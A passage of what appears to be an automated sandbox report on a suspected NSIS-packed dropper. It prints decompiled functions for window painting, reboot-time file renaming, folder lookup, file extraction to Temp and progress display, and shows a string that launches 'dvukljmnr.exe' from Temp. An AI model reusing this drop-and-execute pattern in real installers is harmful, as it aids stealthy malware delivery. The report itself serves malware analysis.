                                                          • open, xrefs: 00404244
                                                          • N, xrefs: 004041CF
                                                          • C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\xxsjdcnfw, xrefs: 0040420C
                                                          • @@, xrefs: 00404241
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                          • String ID: @@$C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\xxsjdcnfw$N$open
                                                          • API String ID: 3615053054-2426900097
                                                          • Opcode ID: f2281ac8f2863318c5f22e1f494ebc6a86efa03034e808f678c97fda4e75fe7b
                                                          • Instruction ID: 2736236621597dd84b1265fd00406a521608d9db3f880d2da7511b3895ae30a3
                                                          • Opcode Fuzzy Hash: f2281ac8f2863318c5f22e1f494ebc6a86efa03034e808f678c97fda4e75fe7b
                                                          • Instruction Fuzzy Hash: 0161D1B1A40309BBEB109F60DC45B6A7BB9FB44715F10407AFB05BA2D1C7B8A9518F98
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 90%
                                                          			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                                                          				struct tagLOGBRUSH _v16;
                                                          				struct tagRECT _v32;
                                                          				struct tagPAINTSTRUCT _v96;
                                                          				struct HDC__* _t70;
                                                          				struct HBRUSH__* _t87;
                                                          				struct HFONT__* _t94;
                                                          				long _t102;
                                                          				signed int _t126;
                                                          				struct HDC__* _t128;
                                                          				intOrPtr _t130;
                                                          
                                                          				if(_a8 == 0xf) {
                                                          					_t130 =  *0x423f28;
                                                          					_t70 = BeginPaint(_a4,  &_v96);
                                                          					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                                                          					_a8 = _t70;
                                                          					GetClientRect(_a4,  &_v32);
                                                          					_t126 = _v32.bottom;
                                                          					_v32.bottom = _v32.bottom & 0x00000000;
                                                          					while(_v32.top < _t126) {
                                                          						_a12 = _t126 - _v32.top;
                                                          						asm("cdq");
                                                          						asm("cdq");
                                                          						asm("cdq");
                                                          						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                                                          						_t87 = CreateBrushIndirect( &_v16);
                                                          						_v32.bottom = _v32.bottom + 4;
                                                          						_a16 = _t87;
                                                          						FillRect(_a8,  &_v32, _t87);
                                                          						DeleteObject(_a16);
                                                          						_v32.top = _v32.top + 4;
                                                          					}
                                                          					if( *(_t130 + 0x58) != 0xffffffff) {
                                                          						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
                                                          						_a16 = _t94;
                                                          						if(_t94 != 0) {
                                                          							_t128 = _a8;
                                                          							_v32.left = 0x10;
                                                          							_v32.top = 8;
                                                          							SetBkMode(_t128, 1);
                                                          							SetTextColor(_t128,  *(_t130 + 0x58));
                                                          							_a8 = SelectObject(_t128, _a16);
                                                          							DrawTextA(_t128, 0x423720, 0xffffffff,  &_v32, 0x820);
                                                          							SelectObject(_t128, _a8);
                                                          							DeleteObject(_a16);
                                                          						}
                                                          					}
                                                          					EndPaint(_a4,  &_v96);
                                                          					return 0;
                                                          				}
                                                          				_t102 = _a16;
                                                          				if(_a8 == 0x46) {
                                                          					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                                                          					 *((intOrPtr*)(_t102 + 4)) =  *0x423f24;
                                                          				}
                                                          				return DefWindowProcA(_a4, _a8, _a12, _t102);
                                                          			}














                                                          APIs
                                                          • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                          • GetClientRect.USER32 ref: 0040105B
                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                          • FillRect.USER32 ref: 004010E4
                                                          • DeleteObject.GDI32(?), ref: 004010ED
                                                          • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                                          • DrawTextA.USER32(00000000,00423720,000000FF,00000010,00000820), ref: 00401156
                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                          • DeleteObject.GDI32(?), ref: 00401165
                                                          • EndPaint.USER32(?,?), ref: 0040116E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                          • String ID: F
                                                          • API String ID: 941294808-1304234792
                                                          • Opcode ID: 300c992b054546ef250a4cd2a637f7cc88d786b6e53a18a04d6cd460370d2829
                                                          • Instruction ID: 28e048358fdb56e3a71f0bf3a5ff7a413e245bc8018749bf15ad205f69265f0b
                                                          • Opcode Fuzzy Hash: 300c992b054546ef250a4cd2a637f7cc88d786b6e53a18a04d6cd460370d2829
                                                          • Instruction Fuzzy Hash: 4241BA71804249AFCB058FA4DD459BFBBB9FF48315F00802AF951AA1A0C738AA50DFA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 82%
                                                          			E00405842() {
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				intOrPtr* _t15;
                                                          				long _t16;
                                                          				int _t20;
                                                          				void* _t28;
                                                          				long _t29;
                                                          				intOrPtr* _t37;
                                                          				int _t43;
                                                          				void* _t44;
                                                          				long _t47;
                                                          				CHAR* _t49;
                                                          				void* _t51;
                                                          				void* _t53;
                                                          				intOrPtr* _t54;
                                                          				void* _t55;
                                                          				void* _t56;
                                                          
                                                          				_t15 = E00405DDA(1);
                                                          				_t49 =  *(_t55 + 0x18);
                                                          				if(_t15 != 0) {
                                                          					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
                                                          					if(_t20 != 0) {
                                                          						L16:
                                                          						 *0x423fb0 =  *0x423fb0 + 1;
                                                          						return _t20;
                                                          					}
                                                          				}
                                                          				 *0x4226c0 = 0x4c554e;
                                                          				if(_t49 == 0) {
                                                          					L5:
                                                          					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x422138, 0x400);
                                                          					if(_t16 != 0 && _t16 <= 0x400) {
                                                          						_t43 = wsprintfA(0x421d38, "%s=%s\r\n", 0x4226c0, 0x422138);
                                                          						_t56 = _t55 + 0x10;
                                                          						_push( *((intOrPtr*)( *0x423f28 + 0x128)));
                                                          						_push(0x422138);
                                                          						E00405B16(_t43, 0x400, 0x422138);
                                                          						_t20 = E004057CB(0x422138, 0xc0000000, 4);
                                                          						_t53 = _t20;
                                                          						 *(_t56 + 0x14) = _t53;
                                                          						if(_t53 == 0xffffffff) {
                                                          							goto L16;
                                                          						}
                                                          						_t47 = GetFileSize(_t53, 0);
                                                          						_t7 = _t43 + 0xa; // 0xa
                                                          						_t51 = GlobalAlloc(0x40, _t47 + _t7);
                                                          						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
                                                          							L15:
                                                          							_t20 = CloseHandle(_t53);
                                                          							goto L16;
                                                          						} else {
                                                          							if(E00405740(_t51, "[Rename]\r\n") != 0) {
                                                          								_t28 = E00405740(_t26 + 0xa, 0x4093a0);
                                                          								if(_t28 == 0) {
                                                          									L13:
                                                          									_t29 = _t47;
                                                          									L14:
                                                          									E0040578C(_t51 + _t29, 0x421d38, _t43);
                                                          									SetFilePointer(_t53, 0, 0, 0);
                                                          									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
                                                          									GlobalFree(_t51);
                                                          									goto L15;
                                                          								}
                                                          								_t37 = _t28 + 1;
                                                          								_t44 = _t51 + _t47;
                                                          								_t54 = _t37;
                                                          								if(_t37 >= _t44) {
                                                          									L21:
                                                          									_t53 =  *(_t56 + 0x14);
                                                          									_t29 = _t37 - _t51;
                                                          									goto L14;
                                                          								} else {
                                                          									goto L20;
                                                          								}
                                                          								do {
                                                          									L20:
                                                          									 *((char*)(_t43 + _t54)) =  *_t54;
                                                          									_t54 = _t54 + 1;
                                                          								} while (_t54 < _t44);
                                                          								goto L21;
                                                          							}
                                                          							E00405AF4(_t51 + _t47, "[Rename]\r\n");
                                                          							_t47 = _t47 + 0xa;
                                                          							goto L13;
                                                          						}
                                                          					}
                                                          				} else {
                                                          					CloseHandle(E004057CB(_t49, 0, 1));
                                                          					_t16 = GetShortPathNameA(_t49, 0x4226c0, 0x400);
                                                          					if(_t16 != 0 && _t16 <= 0x400) {
                                                          						goto L5;
                                                          					}
                                                          				}
                                                          				return _t16;
                                                          			}






















                                                          APIs
                                                            • Part of subcall function 00405DDA: GetModuleHandleA.KERNEL32(4B004178,?,00000000,0040584D,00000001,?,00000000,?,?,004055D7,?,00000000,000000F1,?), ref: 00405DEC
                                                            • Part of subcall function 00405DDA: LoadLibraryA.KERNEL32(4B004178), ref: 00405DF7
                                                            • Part of subcall function 00405DDA: GetProcAddress.KERNEL32(00000000,454E5245,?,00000000,0040584D,00000001,?,00000000,?,?,004055D7,?,00000000,000000F1,?), ref: 00405E08
                                                          • CloseHandle.KERNEL32(00000000), ref: 0040588F
                                                          • GetShortPathNameA.KERNEL32 ref: 00405898
                                                          • GetShortPathNameA.KERNEL32 ref: 004058B5
                                                          • wsprintfA.USER32 ref: 004058D3
                                                          • GetFileSize.KERNEL32(00000000,00000000,00422138,C0000000,00000004,00422138,?,004055D7,?,00000000,000000F1,?), ref: 0040590E
                                                          • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 0040591D
                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405933
                                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00421D38,00000000,-0000000A,004093A0,00000000,[Rename]), ref: 00405979
                                                          • WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 0040598B
                                                          • GlobalFree.KERNEL32(00000000), ref: 00405992
                                                          • CloseHandle.KERNEL32(00000000), ref: 00405999
                                                            • Part of subcall function 00405740: lstrlenA.KERNEL32(?,?,00000000,00000000,0040594E,00000000,[Rename]), ref: 00405747
                                                            • Part of subcall function 00405740: lstrlenA.KERNEL32(?,?,?,00000000,00000000,0040594E,00000000,[Rename]), ref: 00405777
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeLibraryLoadModulePointerProcReadSizeWritewsprintf
                                                          • String ID: %s=%s$8!B$[Rename]
                                                          • API String ID: 3772915668-1989604195
                                                          • Opcode ID: e496e12908088595564ff6a64c263822f6cf314b86cdf927852dc462a35614f3
                                                          • Instruction ID: 485c0dd97f26b0c044a9bc16f28733e4b9e22d15a5ab270111e081fcc94942a4
                                                          • Opcode Fuzzy Hash: e496e12908088595564ff6a64c263822f6cf314b86cdf927852dc462a35614f3
                                                          • Instruction Fuzzy Hash: 6F4102B1604B01BBE7206B659D49F6B3A6CDF45725F04043AFA05F62D1E67CA8018EBE
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 74%
                                                          			E00405B16(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, char _a11) {
                                                          				struct _ITEMIDLIST* _v8;
                                                          				signed int _v12;
                                                          				signed int _v16;
                                                          				signed int _v20;
                                                          				signed int _v24;
                                                          				CHAR* _t31;
                                                          				signed int _t33;
                                                          				signed int _t34;
                                                          				signed int _t45;
                                                          				char _t47;
                                                          				CHAR* _t57;
                                                          				char _t61;
                                                          				signed int _t63;
                                                          				signed int _t75;
                                                          				char* _t76;
                                                          				signed int _t84;
                                                          				signed int _t86;
                                                          				void* _t87;
                                                          
                                                          				_t75 = _a8;
                                                          				if(_t75 < 0) {
                                                          					_t75 =  *( *0x4236fc - 4 + _t75 * 4);
                                                          				}
                                                          				_t76 = _t75 +  *0x423f58;
                                                          				_t31 = 0x422ec0;
                                                          				_t57 = 0x422ec0;
                                                          				if(_a4 - 0x422ec0 < 0x800) {
                                                          					_t57 = _a4;
                                                          					_a4 = _a4 & 0x00000000;
                                                          				}
                                                          				while(1) {
                                                          					_t61 =  *_t76;
                                                          					_a11 = _t61;
                                                          					if(_t61 == 0) {
                                                          						break;
                                                          					}
                                                          					__eflags = _t57 - _t31 - 0x400;
                                                          					if(_t57 - _t31 >= 0x400) {
                                                          						break;
                                                          					}
                                                          					_t76 = _t76 + 1;
                                                          					__eflags = _t61 - 0xfc;
                                                          					if(__eflags <= 0) {
                                                          						if(__eflags != 0) {
                                                          							 *_t57 = _t61;
                                                          							_t57 =  &(_t57[1]);
                                                          							__eflags = _t57;
                                                          						} else {
                                                          							 *_t57 =  *_t76;
                                                          							_t57 =  &(_t57[1]);
                                                          							_t76 = _t76 + 1;
                                                          						}
                                                          						continue;
                                                          					}
                                                          					_t33 =  *((char*)(_t76 + 1));
                                                          					_t63 =  *_t76;
                                                          					_t84 = (_t33 & 0x0000007f) << 0x00000007 | _t63 & 0x0000007f;
                                                          					_v24 = _t63;
                                                          					_v16 = _t33;
                                                          					_t34 = _t33 | 0x00008000;
                                                          					_v20 = _t63 | 0x00008000;
                                                          					_t76 = _t76 + 2;
                                                          					__eflags = _a11 - 0xfe;
                                                          					_v12 = _t34;
                                                          					if(_a11 != 0xfe) {
                                                          						__eflags = _a11 - 0xfd;
                                                          						if(_a11 != 0xfd) {
                                                          							__eflags = _a11 - 0xff;
                                                          							if(_a11 == 0xff) {
                                                          								__eflags = (_t34 | 0xffffffff) - _t84;
                                                          								E00405B16(_t57, _t76, _t84, _t57, (_t34 | 0xffffffff) - _t84);
                                                          							}
                                                          							L32:
                                                          							_t57 =  &(_t57[lstrlenA(_t57)]);
                                                          							_t31 = 0x422ec0;
                                                          							continue;
                                                          						}
                                                          						__eflags = _t84 - 0x1d;
                                                          						if(_t84 != 0x1d) {
                                                          							__eflags = (_t84 << 0xa) + 0x424000;
                                                          							E00405AF4(_t57, (_t84 << 0xa) + 0x424000);
                                                          						} else {
                                                          							E00405A52(_t57,  *0x423f24);
                                                          						}
                                                          						__eflags = _t84 + 0xffffffeb - 7;
                                                          						if(_t84 + 0xffffffeb < 7) {
                                                          							L23:
                                                          							E00405D03(_t57);
                                                          						}
                                                          						goto L32;
                                                          					}
                                                          					__eflags =  *0x423fa4;
                                                          					_t86 = 2;
                                                          					if( *0x423fa4 != 0) {
                                                          						_t86 = 4;
                                                          					}
                                                          					_t45 = _v24;
                                                          					__eflags = _t45;
                                                          					if(_t45 >= 0) {
                                                          						__eflags = _t45 - 0x25;
                                                          						if(_t45 != 0x25) {
                                                          							__eflags = _t45 - 0x24;
                                                          							if(_t45 == 0x24) {
                                                          								GetWindowsDirectoryA(_t57, 0x400);
                                                          								_t86 = 0;
                                                          							}
                                                          							while(1) {
                                                          								__eflags = _t86;
                                                          								if(_t86 == 0) {
                                                          									break;
                                                          								}
                                                          								_t86 = _t86 - 1;
                                                          								_t47 = SHGetSpecialFolderLocation( *0x423f24,  *(_t87 + _t86 * 4 - 0x14),  &_v8);
                                                          								__eflags = _t47;
                                                          								if(_t47 != 0) {
                                                          									L18:
                                                          									 *_t57 =  *_t57 & 0x00000000;
                                                          									__eflags =  *_t57;
                                                          									continue;
                                                          								}
                                                          								__imp__SHGetPathFromIDListA(_v8, _t57);
                                                          								_a8 = _t47;
                                                          								__imp__CoTaskMemFree(_v8);
                                                          								__eflags = _a8;
                                                          								if(_a8 != 0) {
                                                          									break;
                                                          								}
                                                          								goto L18;
                                                          							}
                                                          							L20:
                                                          							__eflags =  *_t57;
                                                          							if( *_t57 == 0) {
                                                          								goto L23;
                                                          							}
                                                          							L21:
                                                          							__eflags = _v16 - 0x1a;
                                                          							if(_v16 == 0x1a) {
                                                          								lstrcatA(_t57, "\\Microsoft\\Internet Explorer\\Quick Launch");
                                                          							}
                                                          							goto L23;
                                                          						}
                                                          						GetSystemDirectoryA(_t57, 0x400);
                                                          						goto L20;
                                                          					}
                                                          					E004059DB(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t45 & 0x0000003f) +  *0x423f58, _t57, _t45 & 0x00000040);
                                                          					__eflags =  *_t57;
                                                          					if( *_t57 != 0) {
                                                          						goto L21;
                                                          					}
                                                          					E00405B16(_t57, _t76, _t86, _t57, _v16);
                                                          					goto L20;
                                                          				}
                                                          				 *_t57 =  *_t57 & 0x00000000;
                                                          				if(_a4 == 0) {
                                                          					return _t31;
                                                          				}
                                                          				return E00405AF4(_a4, _t31);
                                                          			}






















                                                          APIs
                                                          • GetSystemDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\xxsjdcnfw,00000400), ref: 00405C04
                                                          • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\xxsjdcnfw,00000400,00000006,0041FD08,00000000,0041FD08,004055E1,?,00000000,?), ref: 00405C17
                                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\xxsjdcnfw,\Microsoft\Internet Explorer\Quick Launch), ref: 00405C6E
                                                          • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\xxsjdcnfw,00000006,0041FD08,00000000,0041FD08,004055E1,?,00000000,?), ref: 00405CC2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: Directory$SystemWindowslstrcatlstrlen
                                                          • String ID: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\xxsjdcnfw$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                          • API String ID: 4260037668-1027099803
                                                          • Opcode ID: e309b76ed6427bff0fffddde84a9d702ad931276c095d5d1c0ac3f821b73cfe9
                                                          • Instruction ID: fbd4eb8f0a1d10871977b41ef6ccbc0aa49b8648b95f2323881667dae7feb8a3
                                                          • Opcode Fuzzy Hash: e309b76ed6427bff0fffddde84a9d702ad931276c095d5d1c0ac3f821b73cfe9
                                                          • Instruction Fuzzy Hash: 955146B1E08B54ABEF215F748D84B6B3BA8DB11314F248277E512B62C1D23C99419F5D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 80%
                                                          			E004026DF(void __ecx, void* __eflags) {
                                                          				void* _t23;
                                                          				void* _t29;
                                                          				long _t34;
                                                          				struct _OVERLAPPED* _t49;
                                                          				void* _t52;
                                                          				void* _t54;
                                                          				void* _t55;
                                                          				CHAR* _t56;
                                                          				void* _t59;
                                                          				void* _t60;
                                                          				void* _t61;
                                                          
                                                          				_t51 = __ecx;
                                                          				 *((intOrPtr*)(_t61 - 0x3c)) = 0xfffffd66;
                                                          				_t55 = E00402A85(_t49);
                                                          				_t23 = E00405654(_t55);
                                                          				_push(_t55);
                                                          				if(_t23 == 0) {
                                                          					lstrcatA(E004055E7(E00405AF4("C:\Users\Albus\AppData\Local\Temp", "C:\\Users\\Albus\\AppData\\Local\\Temp")), ??);
                                                          					_t56 = 0x4097f8;
                                                          				} else {
                                                          					_push(0x4097f8);
                                                          					E00405AF4();
                                                          				}
                                                          				E00405D03(_t56);
                                                          				E004057AC(_t56);
                                                          				_t29 = E004057CB(_t56, 0x40000000, 2);
                                                          				 *(_t61 + 8) = _t29;
                                                          				if(_t29 != 0xffffffff) {
                                                          					_t34 =  *0x423f2c;
                                                          					 *(_t61 - 0x2c) = _t34;
                                                          					_t54 = GlobalAlloc(0x40, _t34);
                                                          					if(_t54 != _t49) {
                                                          						E004032AF(_t49);
                                                          						E0040327D(_t54,  *(_t61 - 0x2c));
                                                          						_t59 = GlobalAlloc(0x40,  *(_t61 - 0x1c));
                                                          						 *(_t61 - 0x30) = _t59;
                                                          						if(_t59 != _t49) {
                                                          							E00402F71(_t51,  *((intOrPtr*)(_t61 - 0x20)), _t49, _t59,  *(_t61 - 0x1c));
                                                          							while( *_t59 != _t49) {
                                                          								_t51 =  *_t59;
                                                          								_t60 = _t59 + 8;
                                                          								 *(_t61 - 0x40) =  *_t59;
                                                          								E0040578C( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
                                                          								_t59 = _t60 +  *(_t61 - 0x40);
                                                          							}
                                                          							GlobalFree( *(_t61 - 0x30));
                                                          						}
                                                          						WriteFile( *(_t61 + 8), _t54,  *(_t61 - 0x2c), _t61 - 0x34, _t49);
                                                          						GlobalFree(_t54);
                                                          						 *((intOrPtr*)(_t61 - 0x3c)) = E00402F71(_t51, 0xffffffff,  *(_t61 + 8), _t49, _t49);
                                                          					}
                                                          					CloseHandle( *(_t61 + 8));
                                                          					_t56 = 0x4097f8;
                                                          				}
                                                          				_t52 = 0xfffffff3;
                                                          				if( *((intOrPtr*)(_t61 - 0x3c)) < _t49) {
                                                          					_t52 = 0xffffffef;
                                                          					DeleteFileA(_t56);
                                                          					 *((intOrPtr*)(_t61 - 4)) = 1;
                                                          				}
                                                          				_push(_t52);
                                                          				E00401423();
                                                          				 *0x423fa8 =  *0x423fa8 +  *((intOrPtr*)(_t61 - 4));
                                                          				return 0;
                                                          			}

                                                          APIs
                                                          • lstrcatA.KERNEL32(00000000,00000000,C:\Users\user\AppData\Local\Temp,C:\Users\user\AppData\Local\Temp,00000000,00000000), ref: 0040271C
                                                          • GlobalAlloc.KERNEL32(00000040,?,C:\Users\user\AppData\Local\Temp,40000000,00000002,C:\Users\user\AppData\Local\Temp,C:\Users\user\AppData\Local\Temp,00000000,00000000,C:\Users\user\AppData\Local\Temp,C:\Users\user\AppData\Local\Temp,00000000,00000000), ref: 0040275C
                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 00402778
                                                          • GlobalFree.KERNEL32(?), ref: 004027B1
                                                          • WriteFile.KERNEL32(?,00000000,?,?), ref: 004027C3
                                                          • GlobalFree.KERNEL32(00000000), ref: 004027CA
                                                          • CloseHandle.KERNEL32(?), ref: 004027E2
                                                          • DeleteFileA.KERNEL32(C:\Users\user\AppData\Local\Temp,C:\Users\user\AppData\Local\Temp,40000000,00000002,C:\Users\user\AppData\Local\Temp,C:\Users\user\AppData\Local\Temp,00000000,00000000,C:\Users\user\AppData\Local\Temp,C:\Users\user\AppData\Local\Temp,00000000,00000000), ref: 004027F9
                                                            • Part of subcall function 00405AF4: lstrcpynA.KERNEL32(?,?,00000400,00403351,00423720,NSIS Error), ref: 00405B01
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: Global$AllocFileFree$CloseDeleteHandleWritelstrcatlstrcpyn
                                                          • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp
                                                          • API String ID: 3508600917-811135260
                                                          • Opcode ID: d2d92c82f11ecaaef4ef029b20069be8af098a3639b696ed34d4ec1f43b449d7
                                                          • Instruction ID: fcc06673606a62174d5ec44ae6416698489d1e6bc37419cb4e18d2f49fa452d4
                                                          • Opcode Fuzzy Hash: d2d92c82f11ecaaef4ef029b20069be8af098a3639b696ed34d4ec1f43b449d7
                                                          • Instruction Fuzzy Hash: 8A317A72C00524BBCB116FA5CD89DAF7A78EF08364B10823AF924772D1CB7C5C019BA9
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E00402BCA(struct HWND__* _a4, intOrPtr _a8, CHAR* _a12) {
                                                          				intOrPtr _t5;
                                                          				int _t7;
                                                          				CHAR* _t9;
                                                          				int _t18;
                                                          				int _t19;
                                                          				struct HWND__* _t23;
                                                          				void* _t24;
                                                          
                                                          				_t5 = _a8;
                                                          				_t23 = _a4;
                                                          				if(_t5 == 0x110) {
                                                          					SetTimer(_t23, 1, 0xfa, 0);
                                                          					 *0x40b000 = _a12;
                                                          					_t5 = 0x113;
                                                          				}
                                                          				if(_t5 == 0x113) {
                                                          					_t19 =  *0x4170d0; // 0x0
                                                          					_t7 =  *0x41f0e0;
                                                          					if(_t19 >= _t7) {
                                                          						_t19 = _t7;
                                                          					}
                                                          					_t18 = MulDiv(_t19, 0x64, _t7);
                                                          					_t9 =  *0x40b000; // 0x0
                                                          					if(_t9 != 0) {
                                                          						wsprintfA(0x417090, _t9, _t18);
                                                          						_t24 = _t24 + 0xc;
                                                          						SetWindowTextA(_t23, 0x417090);
                                                          						SetDlgItemTextA(_t23, 0x406, 0x417090);
                                                          						ShowWindow(_t23, 5);
                                                          					}
                                                          					if(( *0x409250 & 0x00000001) != 0) {
                                                          						wsprintfA(0x417090, "... %d%%", _t18);
                                                          						E00404E9F(0, 0x417090);
                                                          					}
                                                          				}
                                                          				return 0;
                                                          			}

                                                          APIs
                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402BEC
                                                          • MulDiv.KERNEL32 ref: 00402C16
                                                          • wsprintfA.USER32 ref: 00402C35
